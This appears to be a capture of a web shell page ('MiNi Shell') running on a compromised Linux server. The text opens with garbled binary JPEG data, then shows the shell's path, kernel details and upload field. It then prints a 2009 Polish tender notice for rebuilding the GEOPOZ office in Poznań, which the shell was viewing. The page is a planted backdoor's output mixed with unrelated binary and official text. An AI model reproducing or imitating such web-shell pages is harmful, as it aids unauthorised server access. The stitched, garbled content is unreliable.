JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090430/127984-N-2009.html

<p class="kh_header"><b>Poznań: Przebudowa wraz z częściową rozbudową - ul. Gronowa 20</b><br>
<b>Numer ogłoszenia: 127984 - 2009; data zamieszczenia: 30.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Geodezji i Katastru Miejskiego  GEOPOZ , ul. Gronowa 20, 61-655 Poznań, woj. wielkopolskie, tel. 061 8271861, faks 061 8271882.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.geopoz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa wraz z częściową rozbudową - ul. Gronowa 20.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia publicznego:  
	
	Przedmiotem zamówienia jest przebudowa wraz z częściową rozbudową (dobudowa zewnętrznej klatki schodowej z windą) istniejącego II-kondygnacyjnego budynku stanowiącego wraz z połączonym z nim budynkiem XIV kondygnacyjnym siedzibę ZGiKM GEOPOZ w Poznaniu, ul. Gronowa 20, w tym:

1.	Roboty budowlane (wyburzenia i rozbiórki, dobudowa klatki schodowej z szybem dźwigu osobowego, prace adaptacyjne w części przebudowywanej, roboty wykończeniowe wewnętrzne, dostawa dźwigu, elewacje i elementy zewnętrzne).
2.	Instalacje sanitarne (c.o., c.t., wentylacja, klimatyzacja, wod.-kan.). 
3.	Instalacja elektryczna (prace demontażowe, tablice rozdzielcze i wlz-ty, instalacja oświetleniowa 
i gniazd wtyczkowych, instalacja piorunochronna, badania odbiorcze i pomiary).
4.	Instalacje elektryczne słaboprądowe, w tym trasy kablowe (korytka, kanały i puszki podłogowe), instalacja komputerowa (logiczna), instalacja telefoniczna, systemy bezpieczeństwa (system wykrywania i sygnalizacji pożaru, system włamania i napadu, system kontroli dostępu, instalacja telewizji dozorowej, integracja z systemem zarządzania bezpieczeństwem budynku GEMOS, 
z którym zintegrowane są wszystkie najważniejsze systemy bezpieczeństwa budynku, instalacja videodomofonowa).
5.	Usunięcie kolizji z siecią kanalizacji deszczowej.
6.	Usunięcie kolizji z siecią elektroenergetyczną.
7.	Usunięcie kolizji z siecią telekomunikacyjną.

Szczegółowy zakres i sposób wykonania prac został określony w projekcie budowlanym (Decyzja Prezydenta Miasta Poznania o zatwierdzeniu projektu budowlanego i udzieleniu pozwolenia na budowę nr 711/2009 z dnia 17.04.2009 roku), projektach wykonawczych i projektach usunięcia kolizji, o których mowa w pkt. 5, 6 i 7 oraz w specyfikacjach technicznych wykonania i odbioru robót. Dla zakresu określonego w pkt.1 należy uwzględnić dla projektu wykonawczego architektonicznego rysunki zamienne nr 2Z zamiast nr 2 i 4Z zamiast 4 a dla detali architektonicznych rysunki zamienne nr D6Z, D7Z i D10Z odpowiednio zamiast D6, D7 i D10. Dla zakresu określonego w pkt.4 należy uwzględnić wyłączenie do oddzielnego przetargu systemu zarządzania obsługą klienta oraz zmiany zawarte 
w opracowaniu - Lista zmian do projektu instalacji elektrycznych słaboprądowych. 
W przypadku instalacji elektrycznej rozmieszczenie gniazd zasilających komputery oraz lamp oświetleniowych dostosować do wynikających z ww. zmian rozmieszczenia stanowisk pracy oraz gniazd sieci strukturalnej.
W zakres przedmiotu zamówienia nie wchodzi wyposażenie w regały magazynowe i archiwalne odpowiednio pomieszczeń nr 0/05 (magazyn) oraz nr 0/03 i 0/04 (archiwa i składnice akt), a także wyposażenie meblowe z wyjątkiem kontuarów indywidualnych wraz z biurkami wbudowanych 
w pomieszczeniu informacji/kancelarii (nr1/02) i w kasie (nr 1/04).

Wykaz dokumentacji załączonej do SIWZ zestawiono w tabeli poniżej:

Lp.	Nazwa dokumentacji 
	
1	Projekty wykonawcze 
1.1	Projekt zagospodarowania terenu inwestycji 
Projekt architektoniczno-budowlany przy czym należy uwzględnić dla projektu wykonawczego architektonicznego rysunki zamienne nr 2Z zamiast nr 2 i 4Z zamiast 4 a dla detali architektonicznych rysunki zamienne nr D6Z, D7Z i D10Z odpowiednio zamiast D6, D7 i D10)
1.2	Projekt konstrukcyjny 
1.3	Projekt instalacji sanitarnych 
1.4	Projekt instalacji elektrycznych silnoprądowych 
1.5	Projekt instalacji elektrycznych słaboprądowych 
1.6	Projekt usunięcia kolizji z siecią kanalizacji deszczowej 
1.7	Projekt usunięcia kolizji z siecią telekomunikacyjną 
1.8	Projekt usunięcia kolizji z siecią elektroenergetyczną 
2	Przedmiary robót 
2.1	Architektoniczno-budowlano-konstrukcyjnych 
2.2	Instalacyjnych 
2.3	Instalacji elektrycznych silnoprądowych 
2.4	Instalacji elektrycznych słaboprądowych przy czym należy uwzględnić wyłączenie 
do oddzielnego przetargu Systemu zarządzania obsługą klienta oraz zmiany zawarte w opracowaniu - Lista zmian do projektu instalacji elektrycznych słaboprądowych wraz z rysunkami zamiennymi.
Uwaga:
Nieopublikowana na stronie internetowej dokumentacja dla systemu włamania 
i napadu do wglądu w siedzibie Zamawiającego, po podpisaniu stosownego oświadczenia o zapoznaniu się z nią tylko na potrzeby związane 
z ogłoszonym postępowaniem przetargowym
2.5	Usunięcia kolizji z siecią kanalizacji deszczowej 
2.6	Usunięcia kolizji z siecią telekomunikacyjną 
2.7	Usunięcia kolizji z siecią elektroenergetyczną 
3	Specyfikacje techniczne wykonania i odbioru robót 
3.1	Ogólna 
Robót budowlanych  
Robót drogowych 
3.2	Robót instalacyjnych 
3.3	Robót instalacji elektrycznych silnoprądowych 
3.4	Robót instalacji elektrycznych słaboprądowych 
3.5	Część ogólna - ST 00 
Usunięcia kolizji z siecią elektroenergetyczną 
Usunięcia kolizji z siecią telekomunikacyjną  
3.6.	Usunięcia kolizji z siecią kanalizacji deszczowej 
4.	Decyzja o zatwierdzeniu projektu budowlanego i pozwolenie na budowę


Wszystkie informacje dotyczące materiałów, urządzeń lub wyposażenia umożliwiające identyfikację produktu należy traktować jako bazowe. Wykonawcy robót przysługuje prawo zaproponowania ich zastąpienia przez materiały urządzenia lub wyposażenie o co najmniej równoważnych parametrach technicznych pod warunkiem osiągnięcia założonych w dokumentacji projektowej standardów technicznych. Udowodnienie równoważności leży po stronie wykonawcy, który winien do oferty dołączyć stosowne dowody potwierdzające, że zaproponowane rozwiązania spełniają wymagania określone przez zamawiającego w dokumentacji projektowej i STWiOR. Przyjmuje się, że jeżeli wykonawca nie złoży wykazu przyjętych rozwiązań równoważnych wraz z dowodami potwierdzającymi ich zgodność z rozwiązaniami żądanymi przez zamawiającego, to będzie realizował zamówienie zgodnie 
z projektem. Jeżeli zastosowanie rozwiązań równoważnych pociągnie za sobą konieczność zmian 
w projekcie, które mieszczą się w ramach wydanego pozwolenia na budowę dokona ich na własny koszt wykonawca łącznie z uzyskaniem niezbędnych, wymaganych prawem zatwierdzeń (np. zatwierdzenia rzeczoznawcy ds. zabezpieczeń przeciwpożarowych) przed podpisaniem umowy na realizację zamówienia. Wykonawca proponujący urządzenia i materiały zamienne odpowiedzialny jest przy tym za sprawdzenie możliwości ich zastosowania w realizacji przedmiotu zamówienia pod każdym względem (w tym np: wymiarów, ciężaru, sposobu transportu i montażu).

Realizacja przedmiotu zamówienia w zakresie instalacji systemów bezpieczeństwa 
w ramach pkt.4 będzie się odbywać w ścisłym porozumieniu i pod nadzorem firmy, która 
w latach poprzednich instalowała wszystkie systemy bezpieczeństwa oraz system zarządzania bezpieczeństwem budynku GEMOS a obecnie zajmuje się ich konserwacją.

Wykonawca ma obowiązek wykonania zamówienia we własnym zakresie z wyjątkiem prac ściśle specjalistycznych jak instalacja systemów bezpieczeństwa i ich integracja z systemem zarządzania bezpieczeństwem budynku GEMOS, instalacja wentylacji i klimatyzacji itp., gdzie dopuszcza się udział podwykonawców. 
Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie zamierza powierzyć podwykonawcom.

Zamawiającemu zależy na jak najszybszym wykonaniu prac na parterze budynku w stopniu umożliwiającym instalację w pomieszczeniu nr 0/05 (magazyn) regałów magazynowych,
a w pomieszczeniach nr 0/03 i 0/04 (archiwa i składnice akt) regałów archiwalnych przesuwnych, dlatego należy w miarę możliwości wynikających z technologii wykonania prac taką kolejność realizacji prac przewidzieć w harmonogramie.

Przewiduje się zabezpieczenie należytego wykonania umowy w wysokości 5% wynagrodzenia za przedmiot umowy.

Zamawiający wymaga udzielenia minimum 3 letniej gwarancji jakości na przedmiot zamówienia, a w przypadku, gdy producent udziela gwarancji na okres dłuższy - udzielenie gwarancja producenta.

Zamawiający z uwagi na charakter wynagrodzenia ryczałtowego nie przewiduje możliwości udzielenia zamówień uzupełniających..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.27.00-8, 45.45.30.00-7, 45.33.11.00-7, 45.31.00.00-3, 45.23.32.00-1, 45.33.12.00-8, 45.33.22.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> VII.	Warunki i wymogi wymagane od Wykonawców ubiegających się o zamówienie publiczne oraz sposób występowania podmiotów występujących wspólnie w postępowaniu.

1.	Posiadanie uprawnień do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2.	Posiadanie niezbędnej wiedzy i doświadczenia oraz dysponowanie potencjałem technicznym 
i osobami zdolnymi do wykonania zamówienia lub posiadanie oświadczenia innego podmiotu 
o udostępnieniu potencjału technicznego i osób zdolnych do realizacji zamówienia, w zakresie:
a)	wykonanie w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej dwóch robót budowlanych odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia (budowa lub przebudowa i remont budynków administracyjno-biurowych, o wartości nie mniejszej niż 2.000.000 złotych każda),
b)	dysponowanie osobami posiadającymi uprawnienia budowlane do kierowania robotami budowlanymi w specjalnościach (odpowiednio do zakresu wykonywanych prac - co najmniej 1 osoba w każdej branży): konstrukcyjno-budowlanej, instalacyjnej w zakresie sieci, instalacji 
i urządzeń elektrycznych i elektroenergetycznych, instalacyjnej w zakresie sieci, instalacji 
i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, telekomunikacyjnej,
c)	dysponowanie minimum 1 osobą posiadającą licencję pracownika zabezpieczenia technicznego drugiego stopnia upoważniającą do organizowania i kierowania zespołami pracowników zabezpieczenia technicznego oraz dysponowanie minimum 1 osobą posiadającą licencję pracownika zabezpieczenia technicznego pierwszego stopnia upoważniającą do montażu elektronicznych urządzeń i systemów alarmowych oraz montażu urządzeń i środków mechanicznego zabezpieczenia. Zamawiający wymaga, aby co najmniej 1 osoba wskazana przez Wykonawcę posiadała min. 1 roczne doświadczenie w zakresie obsługi posiadanych przez Zamawiającego systemu wykrywania i sygnalizacji pożaru NOTIFIER ID 3000 oraz z zakresu konfiguracji i integracji wszystkich systemów w Systemie Zarządzania bezpieczeństwem GEMOS,
3.	Znajdowanie się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
tj. posiadanie aktualnego na dzień składania ofert ubezpieczenia od odpowiedzialności cywilnej 
w zakresie prowadzonej działalności na sumę minimum 2.000.000,00 zł.
4.	Niepodleganie wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust. 2 ustawy Pzp
5.	Wymagania w zakresie przedmiotu zamówienia: spełnianie wymagań określonych w dokumentacji projektowej i STWiOR dla rozwiązań równoważnych - jeżeli Wykonawca oferuje rozwiązania równoważne.
W celu spełnienia warunków udziału w niniejszym postępowaniu Zamawiający dokona oceny 
i sprawdzenia kompletności oraz poprawności złożonych dokumentów pod względem zgodności 
z postanowieniami ustawy i Specyfikacji istotnych warunków zamówienia w sposób: spełnia - nie spełnia.
(Dotyczy podmiotów wspólnie ubiegających się o zamówienie)
Ustanowienie pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego, albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> IX.	Wymagane oświadczenia i dokumenty

Wymaga się złożenia w ofercie:
1.	Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia 
do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.	Jeżeli zasady reprezentacji nie wynikają jednoznacznie z przedłożonych wypisów (odpisów), wymaga się złożenia dokumentu wskazującego osobę uprawnioną do reprezentowania składającego (składających) ofertę.
3.	Aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4.	Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5.	Aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6.	Wykazu wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie - Rozdz. VII, pkt 2 lit. a)
7.	Wykazu osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć 
w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - Rozdz. VII, pkt 2 lit. b) i c)
8.	Pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 7, wykonawca wskazał osoby, którymi będzie dysponował.
9.	Dokumentów stwierdzających, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień  - Rozdz. VII, pkt 2 lit. b) i c)
10.	Zaświadczenia podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym, potwierdzające, że proponowane produkty odpowiadają określonym normom lub specyfikacjom technicznym dla udokumentowania, że zaproponowane rozwiązania równoważne odpowiadają wymaganiom określonym przez zamawiającego w dokumentacji projektowej i STWiOR.
11.	Oświadczenie dotyczące art. 22 ust. 1 ustawy - Pzp.
12.	Formularz ofertowy.
13.	Jeżeli Wykonawca będzie zainteresowany rozliczaniem robót na podstawie faktur częściowych, 
o których mowa w §7 ust.2b projektu umowy, oferta musi zawierać uproszczoną kalkulację wynagrodzenia sporządzoną przez Wykonawcę oraz sporządzony na jej podstawie harmonogram rzeczowo-finansowy. 
14.	Jeżeli Wykonawca będzie zainteresowany rozliczaniem robót tylko jedną fakturą po końcowym odbiorze robót, oferta musi zawierać jedynie harmonogram rzeczowy.
15.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów:
1)	o których mowa w pkt 1, 3 i 5 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
2)	pkt 4 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym 
w art. 24 ust. 1 pkt 4-8 ustawy.
3)	Dokumenty, o których mowa w pkt 1) lit. a i c oraz pkt 2, powinny być wystawione 
nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie 
do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. Dokument, o którym mowa w pkt 1) lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4)	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 13 ppkt 1) i 2), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę 
lub miejsce zamieszkania. Przepis pkt 13 ppkt 3) stosuje się odpowiednio.
16.	(Dotyczy Wykonawców wspólnie ubiegających się o zamówienie publiczne) Pełnomocnictwo 
do reprezentowania Wykonawców składających ofertę wspólną albo reprezentowania 
w postępowaniu i zawarcia umowy w oryginale lub notarialnie poświadczonej kopii. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców, którzy wspólnie ubiegają 
się o udzielenie zamówienia. Ponadto - zamawiający przed podpisaniem umowy może żądać kopii umowy podmiotów występujących wspólnie w postępowaniu.
17.	Jeżeli Wykonawca zastrzega niejawność informacji stanowiących treść oferty, może załączyć do oferty wypełniony i podpisany załącznik nr 4 do SIWZ oraz wpiąć dokumenty, których treść stanowi tajemnicę przedsiębiorstwa w nieprzejrzyste folie. Niedopełnienie zafoliowania może skutkować jawnością całej oferty. Nie ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeżeli wykonawca, nie później niż w terminie składania ofert, zastrzegł, że nie mogą być one udostępniane. Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 ustawy - Pzp. Tajemnicę przedsiębiorstwa stanowią wyłącznie informacje w rozumieniu przepisów 
o zwalczaniu nieuczciwej konkurencji.
Dokumenty można złożyć w formie oryginałów lub kserokopii poświadczonych za zgodność z oryginałem przez jedną z osób uprawnionych do reprezentacji Wykonawcy z dopiskiem: za zgodność z oryginałem. Wzory dokumentów, na których można składać ofertę zawarto w SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.geopoz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ZGiKM GEOPOZ, ul. Gronowa 20, 61-655 Poznań, IX piętro. pok. 917.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2009 godzina 10:00, miejsce: ZGiKM GEOPOZ, ul. Gronowa 20, 61-655 Poznań, IX piętro. pok. 917.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com